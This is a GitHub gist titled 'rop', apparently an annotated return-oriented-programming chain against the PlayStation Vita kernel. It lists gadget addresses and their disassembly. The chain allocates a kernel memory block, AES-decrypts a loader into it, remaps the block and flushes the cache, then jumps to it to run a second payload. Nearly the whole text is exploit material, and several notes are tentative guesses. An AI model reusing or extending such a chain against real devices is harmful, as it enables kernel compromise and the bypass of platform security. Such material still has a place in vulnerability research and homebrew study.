Create a gist now

Instantly share code, notes, and snippets.

@St4rk /rop Secret
Created Oct 21, 2016

00AC0031 start
ROM:00AC0030 POP {R0,PC}
08106803 r0
00ADeff1 pc
lsls r0, r0, #1
00000038 r3
00ADefe1 pc
MOV R1, R0 - type 0x1020D006
00AC0347 r3
00AC39eb pc
ROM:00AC39EA BLX R3
ROM:00AC39EC POP {R3,PC}
00ADb571 pc
LSLS R2, R0, #5 - 0x41A00C0
ROM:00ADB572 BX LR
00000000 r3 - nullptr
00AC1e43 pc
ROM:00AC1E42 AND.W R2, R2, #0xF0000
ROM:00AC1E46 CMP.W R2, #0x40000
ROM:00AC1E4A BEQ loc_AC1E50
ROM:00AC1E4C MOVS R0, #0
ROM:00AC1E4E POP {R3-R5,PC}
00000000 r3 - nullptr
00ADfc6d r4
00ACea73 r5
00AC0031 pc
ROM:00AC0030 POP {R0,PC}
00AE7913 r0 - SceMagic
00ACa523 pc
r0 = name SceMagic
r1 = type 0x1020D006
r2 = size 0xA0000
r3 = nullptr
sceKernelAllocMemBlock(const char *name, SceKernelMemBlockType type, int size, SceKernelAllocMemBlockOpt *optp);
r0 = mem_id
00AC0347 r4
00AC0ce3 pc
ROM:00AC0CE2 POP {R4-R7,PC}
00AC0347 r4
00ADf2b1 r5
00AC0067 r6
00AC587f r7
00AD9713 pc
ROM:00AD9712 ADD R3, SP, #0x28 <- mem base
ROM:00AD9714 BLX R7
MOVS R2, R0
00AC1605 r4
00AC1e1d pc
ROM:00AC1E1C MOV R0, R3
ROM:00AC1E1E POP {R4,PC}
00000000 r4
00ADefe1 pc
MOV R1, R0
00AC0347 r3
00AC1603 pc -> set memid
ROM:00AC1602 MOV R0, R2
ROM:00AC1604 POP {R3,PC}
00ADf2b1 r3
r0 = memid
r1 = ptr_base
00AC1f17 pc sceKernelGetMemBlockBaseForKernel
00AC0347 r3 <- mem base ?
00AC0031 pc <- mem base ?
ROM:00AC0030 POP {R0,PC}
00ACb913 r0 <- mem base ?
00AE3b61 pc
MOVS R7, R0 ; membase ?
ROM:00AE3B66 POP {R3,PC}
00AC0347 r3
00AC39eb pc
ROM:00AC39EA BLX R3
ROM:00AC39EC POP {R3,PC}
00AE32eb pc
ROM:00AE32EA MOVS R0, #8 ; R0 = 8
ROM:00AE32EC BX LR
00AC0347 r3
00ADb571 pc
LSLS R2, R0, #5 ; R2 = 0x100
ROM:00ADB572 BX LR
00AE3b61 r3
00AE32f1 pc
ROM:00AE32F0 MOVS R0, #0x80 ; r0 = 0x80
ROM:00AE32F2 BX LR
00AC1411 r3
00AC0ae1 pc
MOVS R1, R0 ; r1 = 0x80 (block size ?)
ROM:00AC0AE2 BX LR
00AC0347 r3
00AC50e9 pc
ROM:00AC50E8 MOV R0, R7 ; r0 = membase ?
ROM:00AC50EA BLX R3
00AC1411 pc
ROM:00AC1410 POP {R4,R5,PC}
00000090 r4
00ADf2b1 r5
00AD2b11 pc
ROM:00AD2B10 ADDS.W R0, R0, R4,LSL#2 membase + 0x240
ROM:00AD2B14 BEQ loc_AD2ADE
ROM:00AD2B16
ROM:00AD2B16 loc_AD2B16
ROM:00AD2B16
ROM:00AD2B16 ADD SP, SP, #8
ROM:00AD2B18 POP {R4,PC}
00AC0ce3 sp+4
00AC00d1 sp+8
00AC0347 r4
00ADf2b1 pc
ROM:00ADF2B2 EOR R9, R0, #0x40 ; ctx
ROM:00ADF2B4 POP {R3,PC}
00AC0347 r3
00AC39eb pc
ROM:00AC39EA BLX R3
ROM:00AC39EC POP {R3,PC}
00ADfdc5 pc
ROM:00ADFDC4 MOV R3, LR - key
ROM:00ADFDC6 BLX R4
r0 = ctx
r1 = block_size
r2 = keysize
r3 = key
00ADd8db - set aes key 0
00AD9399 r4
00AD9399 pc
; loop starts here
ROM:00AD9398 MOV R0, R9 ; r0 = ctx
ROM:00AD939A MOV R1, R4 ; r1 = 00AD9399
ROM:00AD939C LDR R2, [SP,#8] ; 00AD9399
ROM:00AD939E MOVS R3, #0 ; r3 = 0
ROM:00AD93A0 BLX R5
ROM:00ADF2B2 LSRS R0, R0, #5 ; ctx >> 5
ROM:00ADF2B4 POP {R3,PC}
00AD1c5f r3
00AD9399 pc
ROM:00AD9398 MOV R0, R9 ; r0 = ctx
ROM:00AD939A MOV R1, R4 ; r1 = 00AD9399
ROM:00AD939C LDR R2, [SP,#8] ; 00AD9399
ROM:00AD939E MOVS R3, #0 ; r3 = 0
ROM:00AD93A0 BLX R5
ROM:00ADF2B2 LSRS R0, R0, #5 ; ctx >> 5
ROM:00ADF2B4 POP {R3,PC}
00AC0347 r3
00ACb913 pc
ROM:00ACB914 ADD R0, R4 ; r0 = r0 + 00AD9399
ROM:00ACB916 ADD R1, R2 ; r1 = r1 + 00AD9399
ROM:00ACB918 CMP R0, R1 ; compare
ROM:00ACB91A ITE HI
ROM:00ACB91C MOVHI R0, #0 ; r0 = 0 if (r0 > r1)
ROM:00ACB91E MOVLS R0, #1 ; r0 = 1 if (r0 < r1)
ROM:00ACB920 ADD SP, SP, #8
ROM:00ACB922 POP {R4,PC}
00000000 sp+4
00ADefe1 sp+8
00AC0347 r4
00AC1861 pc
ROM:00AC1860 MOVS R0, #0 ; r0 = 0
ROM:00AC1862 POP {R3,PC}
00ADfc6d r3
00ADf2b1 pc
ROM:00ADF2B2 LSRS R0, R0, #5 ; r0 >> 5
ROM:00ADF2B4 POP {R3,PC}
00AC0347 r3
00AC39eb pc
ROM:00AC39EA BLX R3
ROM:00AC39EC POP {R3,PC}
00AD9399 pc
ROM:00AD9398 MOV R0, R9 ; r0 = r9
ROM:00AD939A MOV R1, R4 ; r1 = 00AC0347
ROM:00AD939C LDR R2, [SP,#8] ; 00AD9399
ROM:00AD939E MOVS R3, #0 ; r3 = 0
ROM:00AD93A0 BLX R5
ROM:00ADF2B2 LSRS R0, R0, #5
ROM:00ADF2B4 POP {R3,PC}
00AC0347 r3
00AD9399 pc
ROM:00AD9398 MOV R0, R9 ; r0 = r9
ROM:00AD939A MOV R1, R4 ; r1 = 00AD9399
ROM:00AD939C LDR R2, [SP,#8] ; r2 = 00AC39eb
ROM:00AD939E MOVS R3, #0 ; r3 = 0
ROM:00AD93A0 BLX R5
ROM:00ADF2B2 LSRS R0, R0, #5
ROM:00ADF2B4 POP {R3,PC}
00AC0347 r3
00AC39eb pc
ROM:00AC39EA BLX R3
ROM:00AC39EC POP {R3,PC}
00AD614d pc
ROM:00AD614C ADDS R0, #0x10 ; next block
ROM:00AD614E BX LR
00AE33d3 r3
00Adf2b1 pc
ROM:00ADF2B2 LSRS R0, R0, #5 ; r0 >> 5
ROM:00ADF2B4 POP {R3,PC}
00AC0347 r3
00AC00af pc
ROM:00AC00AE NEGLS R0, R0 ; r0 ~= r0
ROM:00AC00B0 BX LR
00AC1605 r3
00ADefe1 pc
0xADEFE1: MOVS r1, r0 ; r0 = r1
0xADEFE3: POP {r3, pc}
00AC0347 r3
00AC50e9 pc
ROM:00AC50E8 MOV R0, R7 ; r0 = membase ?
ROM:00AC50EA BLX R3
00AC39eb pc
ROM:00AC39EA BLX R3
ROM:00AC39EC POP {R3,PC}
00AC1347 pc
0xAC1347: movs r2, r0 ; r2 = membase ?
0xAC1349: bx lr
00AC0347 r3
00AC00b9 pc
ROM:00AC00B8 SUBS R0, R2, R1 ; r0 = membase - cnt
ROM:00AC00BA BX LR
00ADf2b1 r3
00AC1347 pc
0xAC1347: movs r2, r0 ; r2 = membase - cnt ?
0xAC1349: bx lr
00AC0347 r3
00AC039b pc
ROM:00AC039A POP {R4,PC}
DEADBEEF r4 -- loader addr
00ADcb95 pc
ROM:00ADCB94 SUBS R1, R4, R1 ; r1 = loadr_addr -cnt
ROM:00ADCB96 BLX R3
00ADea93 pc
ROM:00ADEA92 MOV R0, R6 ; r0 = 00AC0067
ROM:00ADEA94 BLX R3
00AC1411 pc
00AC0347 r4
00AE09d7 r5
00AE09d3 pc
ROM:00AE09D2 STR R5, [SP,#0xC] ; r5 = 00AE09d7
ROM:00AE09D4 LDR R5, [SP,#0x38] ; 00AC652b ?
ROM:00AE09D6 STR R5, [SP,#0x10] ;
ROM:00AE09D8 BLX R4
00AC1411 pc
ROM:00AC1410 POP {R4,R5,PC}
00AC0347 r4
00ADbaf5 r5 - aes decrypt
00AC1605 pc - either 00AE09d7
ROM:00AC1604 POP {R3,PC}
00AC0347 r3 - either 00AC652b
00AC652b pc
ROM:00AC652A ADD SP, SP, #0xC
ROM:00AC652C POP {PC}
00AC0347 0x4
00ADbaf5 0x8 - aes decrypt
00AE2a49 0xC
00AE09d7 pc
ROM:00AE09D6 STR R5, [SP,#0x10]
ROM:00AE09D8 BLX R4
00AC039b pc
00000040 r4
00AE2a49 pc
ROM:00AE2A48 SUBS R0, R0, R4
ROM:00AE2A4A POP {R4,PC}
00AC0347 r4 ; either 00AC652b ?
00AC652b pc <- loop
ROM:00AC652A ADD SP, SP, #0xC
ROM:00AC652C POP {PC}
00AC0347 0x4
00AC039b 0x8
00000040 0xC
00AC1605 pc
ROM:00AC1604 POP {R3,PC}
00AC0347 r3
00ADd9eb pc
ROM:00ADD9EA ADD R2, SP, #0xBC
ROM:00ADD9EC BLX R3
00AC39eb pc
ROM:00AC39EA BLX R3
ROM:00AC39EC POP {R3,PC}
00AC0853 r3
00ADd8db -- aes init ?
ROM:00ADD8E6 POP {R4,PC}
00000038 r3
00AC00ab pc
ROM:00AC00AA SUBS R2, R2, R1
ROM:00AC00AC IT LS
ROM:00AC00AE NEGLS R0, R0
ROM:00AC00B0 BX LR
00AC00d1 r3
00AE328b pc
ROM:00AE3288 ORR.W R0, R2, #0x11
ROM:00AE328C POP {R4,PC}
00AE2fcd r3
00AC00d1 pc
ROM:00AC00CE SUB.W R0, R0, R12
ROM:00AC00D2 BX LR
00ADeff1 r3
00AEa117 pc
ROM:00AEA116 POP {R2,R5,PC}
00AC0347 r2
00AC1605 r5
00AD9399 pc
ROM:00AD9398 MOV R0, R9
ROM:00AD939A MOV R1, R4
ROM:00AD939C LDR R2, [SP,#8]
ROM:00AD939E MOVS R3, #0
ROM:00AD93A0 BLX R5
00AC0347 r3
00AC39eb pc
ROM:00AC39EA BLX R3
ROM:00AC39EC POP {R3,PC}
00ADbf1f
ROM:00ADBF1C LDR.W R0, [R0,R2,LSL#2]
ROM:00ADBF20 BX LR
fffffeb0 r3
00AC039b pc
ROM:00AC039A POP {R4,PC}
00000240 r4
00AE2a49 pc
ROM:00AE2A48 SUBS R0, R0, R4
ROM:00AE2A4A POP {R4,PC}
00AC39eb r4
00AC3d73 pc
ROM:00AC3D72 ITE NE
ROM:00AC3D74 MOVNE R0, R3
ROM:00AC3D76 MOVEQ R0, #0
ROM:00AC3D78 BX LR
00000000 r3
00AC21fd pc
ROM:00AC21FE CMP R3, #0
ROM:00AC2200 BNE loc_AC21E2
ROM:00AC2202
ROM:00AC2202 loc_AC2202 ; CODE XREF: sub_AC21C0+1Cj
ROM:00AC2202 ; sub_AC21C0+30j ...
ROM:00AC2202 POP {R4}
ROM:00AC2204 BX LR
00AC0347 r4
00AC50e9 r3
00AC0ae1 pc
ROM:00AC0ADE ORREQ.W R0, R0, #1
ROM:00AC0AE2 BX LR
00AC0347 r3
00AEa117 pc
ROM:00AEA116 POP {R2,R5,PC}
00AC0347 r2
00ADf2b1 r5
00AC0067 pc
; end of while probably
ROM:00AC0066 MOV SP, R1
ROM:00AC0068 BLX R2
ROM:00AC006A MOV SP, R4
ROM:00AC006C POP.W {R4-R12,PC}
00AC39eb pc
ROM:00AC39EA BLX R3
ROM:00AC39EC POP {R3,PC}
00ADbf47 pc
ROM:00ADBF46 MOVNE R1, #0 ; r1 = 0
ROM:00ADBF48 BX LR
00AC0347 r3
00AC50e9 pc
ROM:00AC50E8 MOV R0, R7 ; r0 = membase
ROM:00AC50EA BLX R3
00ACaf33 pc - something dealing with membase
00AC0347 r3
00ADd9eb r4
DEADBABE r5 - second_payload ; used as argument in the loader.enc
00ADfc6d pc
ROM:00ADFC6C BLX R3
ROM:00ADFC6E POP {R4,PC}
00ACea73 pc
movs r3, r0 ; return from
ROM:00ACEA74 BX LR
00AC039b r4
00AC0853 pc
ROM:00AC0852 POP {R0,R1,PC}
ROM:00AC039A POP {R4,PC}
ffffffff r0
08106803 r1 ; memory type
00AE33d3 pc
ROM:00AE33D3 lsls R2, R1, #1 memtype << 1
ROM:00AE33D4 BX LR
00AC0347 r4
00AC0433 pc
ROM:00AC0432 SUBS R1, R2, #1 memtype -= 1
ROM:00AC0434 ANDS R0, R1
ROM:00AC0436 BEQ loc_AC0440
ROM:00AC0438 CLZ.W R0, R0
ROM:00AC043C SUB.W R4, R3, R0,LSR#3
ROM:00AC0440
ROM:00AC0440 loc_AC0440
ROM:00AC0440 SUBS R0, R4, #1
ROM:00AC0442 POP {R4,PC}
00AE33d3 r4
00AD50a3 pc
ROM:00AD50A2 MOV R0, R3 ; mem id ?
ROM:00AD50A4 POP {R3,PC}
00000000 r3
r0 = memid
r1 = memtype
00ACa74d ;remap memblock ?
ROM:00ACA74C PUSH.W {R4-R10,LR}
ROM:00ACA750 MOV R6, #dword_AEA004
ROM:00ACA758 SUB SP, SP, #0x10
00AC0000 membase
00AC0853 pc
ROM:00AC0852 POP {R0,R1,PC}
00ADbf1f r0
ROM:00ADBF1C LDR.W R0, [R0,R2,LSL#2]
ROM:00ADBF20 BX LR
00000200 r1 ; size to flush cache
00AC1605 pc
ROM:00AC1604 POP {R3,PC}
00AC0347 r3
ROM:00AC0346 POP {PC}
00AC50e9 pc
ROM:00AC50E8 MOV R0, R7 ; mem id
ROM:00AC50EA BLX R3
00AC1605 pc
ROM:00AC1604 POP {R3,PC}
00AE2fcd r3 - flush cache
00AC39eb pc
ROM:00AC39EA BLX R3
ROM:00AC39EC POP {R3,PC}
00AC0853 r3
ROM:00AC0852 POP {R0,R1,PC}
00AD1c5f ; trigger payload code execution
ROM:00AD1C5C ADDS R4, #1 ;
ROM:00AD1C5E BLX R7 ; jump to membase
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment